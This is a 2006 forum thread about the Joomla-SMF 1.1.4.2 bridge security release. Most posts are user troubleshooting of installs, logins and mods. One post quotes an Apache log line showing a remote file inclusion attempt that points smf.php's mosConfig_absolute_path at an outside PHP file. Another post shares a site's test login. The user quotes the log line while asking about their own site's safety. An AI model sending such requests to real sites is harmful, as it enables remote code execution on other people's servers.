Title: Joomla-SMF 1.1.4.2 Security Release Post by: -Wolverine on July 11, 2006, 09:54:02 PM This is simply a security release including two small bug fixes to 1.1.4. Since there is a reported security problem in mambo-smf I was alerted to some potential problems with the current JSMF 1.1.4. This build addresses those problems. I have also included all the user submitted language files, thanks to everyone for them(Imago, Özgür Üzden, videoed, kirck, mikeho)!
In this version I have made sure that patches to the J! index.php are universal such that the same patched index.php will work on all sites. In that regards, I am attaching a patched J! 1.0.10 index.php for those that continue to have issues patching their systems. To install it YOU MUST FOLLOW THE INSTRUCTIONS IN THE _README_FIRST.txt FILE! Making a mistake can cause your site to go down and I will not be there to help you pick up the pieces, so use this at your own risk! Installation instructions
Further requirements and installation instructions can be found in _README_FIRST.txt. Title: Re: Joomla-SMF 1.1.4.1 Security Release Post by: fanfan11 on July 12, 2006, 02:40:23 AM when i click Joomla-SMF-Forum -> Configuration .

Title: Re: Joomla-SMF 1.1.4.2 Security Release Post by: -Wolverine on July 12, 2006, 07:15:38 PM should be all set, a big part of the problem was the rdf feeds had all kinds of html special chars in there. That caused IE to fail and not include the task(which is at the bottom of the form). Should be good to go now, I updated the download.
Title: Re: Joomla-SMF 1.1.4.2 Security Release Post by: Darren on July 12, 2006, 07:33:20 PM You know, I still have the problem I had with 1.1.3, and 1.1.1. The page loads to a point, but does not go beyond. I also have tried copying in the index.php file. What version of PHP has this been tested with? I am wondering if that might be a problem. Another thought might be something doing with the php.ini file, as I also have problem running the googlemap component from another person. Variables seem to be funky depending on the php version has been developed for.
See below for the other post I had... It appears that $ret is not loaded correctly to me. First pass at this review and many hours looking this over by this point. Code: if ($ret) { require_once( $path ); } else { mosNotAuth(); } Okay, so I sat up and stepped through the code and found that as I step through the $path, I end up with a failure on the call in com_content. I think this must be a masking of an issue from another spot. May there be a global variable in com_smf that might be interferring with Joomla and how it is displaying? Is there notes on doing a manual patch of index.php? I am willing to help look through this. You can PM me and I will try and make a work around. I stepped through the index.php file and followed it to the content.php file where it finally stops showing at. Anyone have ideas? BTW, this works on my other server, but going back to that server is not an option as I am going to go on to develop a full GIS server that needs to have the supporting forum to work with it. I am using Joomla 1.0.10, Simple Machines Forum 1.1RC2, Community Builder 1.0RC2 and your JSMF 1.1.4. When i check my Apache log files, i can see several lines like the following : Code: 69.10.136.167 www.mydomain.com - [23/Jul/2006:19:44:19 +0200] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.podgorz.cc/e.php?? HTTP/1.0" 200 156 "-" "Mozilla/5.0" Apparently, someone is trying to hack my site. How can this be harmfull for my site ? I guess the JSMF is secured against this kind of attack ? In the install instructions, there is a section "Upgrading from J!-SMF Forum Releases", which I'm assuming applies to my case (upgrading from 1.1.02). It says: Quote 1. Uninstall the previous version of Mambo-SMF Forum, recent topics modules, and optional login module. 2. Uninstall the SMF Mod from SMF Package Manager. 3. Install the new Joomla-SMF Forum. Regarding the "SMF Mod" - is this referring to the SMF 1.1RC2-1 security patch ? Does it need to be re-installed after installing JSMF 1.1.4.2? Title: Re: Joomla-SMF 1.1.4.2 Security Release Post by: Fofo on August 21, 2006, 07:58:08 AM Hello,
As far as i know, J-SMF 1.1.4.2 requires Community Builder (CB 1.0RC2). It appears now that there is a security issue in CB 1.0RC2) and that the fix is available in CB 1.0.1 . If you upgrade CB from 1.0RC2 to 1.0.1, will the J-SMF work properly? See http://forum.mamboguru.com/showthread.php?p=2049 (http://forum.mamboguru.com/showthread.php?p=2049) for security issue noticed in CB. Title: Re: Joomla-SMF 1.1.4.2 Security Release Post by: HighlanderICT on August 21, 2006, 10:08:41 AM re: earlier problem about google member map
I had problems with a number of the SMF packages after upgrading the bridge to 1.1.4.2 so uninstalled them all and reinstalled them. This has solved a number of package problems that caused my staff page, googlemap, rename topic, and a few other packages to stop working completely. I also discovered that the 'visual warning' mod hates all my other mods and gives lots of 'test failed' errors even when applied first on a vanilla install so have discarded it completely. I further noticed that the Global Announcements mod ONLY creates an admin menu entry if it is added BEFORE the recently released mod that adds an admin "modifications" menu. Anyway - back to google membermap - As i mentioned at the top of this message, re-installing my packages seems to get most of them working but the googlemap mod behaves differently depending on how you view it. If it is viewed in the wrapped forum using the bridge, I get the map displayed but no pins CLICK (http://hmssneck.com/ict/index.php?option=com_smf&Itemid=292&action=googlemap)[registration required]. However, if I view it at the full url of the forum it displays fine CLICK (http://www.hmssneck.com/ict/community/index.php?action=googlemap) [registration required] Title: Re: Joomla-SMF 1.1.4.2 Security Release Post by: MegaBurn on August 21, 2006, 02:15:07 PM I just did a full site upgrade, summary:
Joomla 1.0.8 -> 1.0.10 Community Builder 1.0RC2 -> 1.0.1 JSMF 1.1.2 -> 1.1.4.2 MamboWiki 0.95.2-> 0.96 SMF 1.0RC2 (not upgraded) After all that the only major problem is some kind of sync error between JSMF and CB. Logging in with the CB login module works fine with Joomla but fails to log users into SMF. As a temporary fix I disabled the CB login module, re-enabled the normal Joomla login module, and changed the JSMF settings accordingly. This seems to work normally but I get a weird problem with it saying "Hi, 0" after login rather than the users name. I know you guys are working on JSMF 2.0. I saw the note about it being another few weeks with beta testing and what not. Can you please release a patch for JSMF 1.1.4.2 to add support for CB 1.0.1 -or- tell me how to fix the CB/JSMF login problem? Well, i just did a full sit upgrade like megaburn : Jaclplus and Joomla 1.0.8 -> Jacplus/1.0.10 by a patch of byotech Community Builder 1.0RC2 -> 1.0.1 JSMF 1.1.2 -> 1.1.4.2 SMF 1.0RC2 not upgraded So, i use the login module of CB, there are many bugs when i try to login. So i don't know how to say it, you can see my site here : www.processqlio.info login : test password : xtestx - when i'm logged with CB module and i'm going to the forum, i'm not logged in SMF - when i use the modulelogin of SMF, it's ok but when i go to Joomla i'm not logged - when i'm logged with CB module and i'm going to the forum and i'm going to the first page of my site (page One -> SMF -> Page One), i'm logged because i can see different option of my statut, but the module login is unlogged ! - when somebody do an new registration, the user-registration in CB don't take the confirmation of this user when he click as the email that it received after his registration, so i can't know who want to suscribe on my cite ! so, i have the same question as MegaBurn, Is JSMF 1.1.4.2 compatible with CB 1.0.1 ? Perhabs there are fix to do manually ? If somebody can help us, it wil be my hero ;-) VERY THANKS FOR YOUR GOOD JOB ! JB OK, i have just understood... Well, i have installed the module SMF_LOGIN and i have modified the configuration of the bridge like here : "module login" -> SMF Login "module register" -> CB know all are ok ! Sorry for my st$p$d first question ! JB Title: Re: Joomla-SMF 1.1.4.2 Security Release Post by: mike elliott on October 20, 2006, 07:08:49 PM HI,

Perspective on November 24, 2006, 02:00:03 PM I would greatly appreciate any suggestions you could offer.
I have: Joomla 1.0.11 AEC 0.10.1 (Account Expiration Control from globalnerd.org) SMF 1.1 RC3 JoomlaHack: Joomla-SMF bridge version: 2.0 RC1 It didn't work, I was told by AEC that the JoomlaHacks bridge was not compatable with AEC 0.10.1, and that I should switch to JoomlaHacks SMF 1.1.4.2 bridge. I did that, and it still didn't work. My hosting company tells me that Hack 1.1.4.2 does not work with Joomla 1.0.11 as it was only released with a 1.0.10 patch. My host will only host Joomla 1.0.11, and the last two bridges don't seem to work for AEC and Joomla respectivly, is there another bridge I should try? I am now hopelessly in over my head. My client's site was scheduled to lauch today, and I have no idea where to turn. Can anyone help (I'll gladly pay) or offer a suggestion? Thanks Title: Re: Joomla-SMF 1.1.4.2 Security Release Post by: oobie on December 26, 2006, 05:36:13 AM Hi, I have recently installed a fresh Joomla 1.0.12 and SMF 1.1 and just tonight installed Joomla-SMF 1.1.4.2. After installing the bridge, when I try to access the config page, I get this:
Quote Parse error: syntax error, unexpected ';' in sitepath/administrator/components/com_smf/config.smf.php on line 6 I have tried Orstio's Bridge and it mystified me to be honest. I am using an old version of Mambo-SMF on another site and it's always worked OK so I am looking forward to the same ease of use with the new software too. Cheers, Paul Title: Re: Joomla-SMF 1.1.4.2 Security Release Post by: -Wolverine on December 26, 2006, 10:49:52 AM you should be using JSMF 2.0. Check this thread:
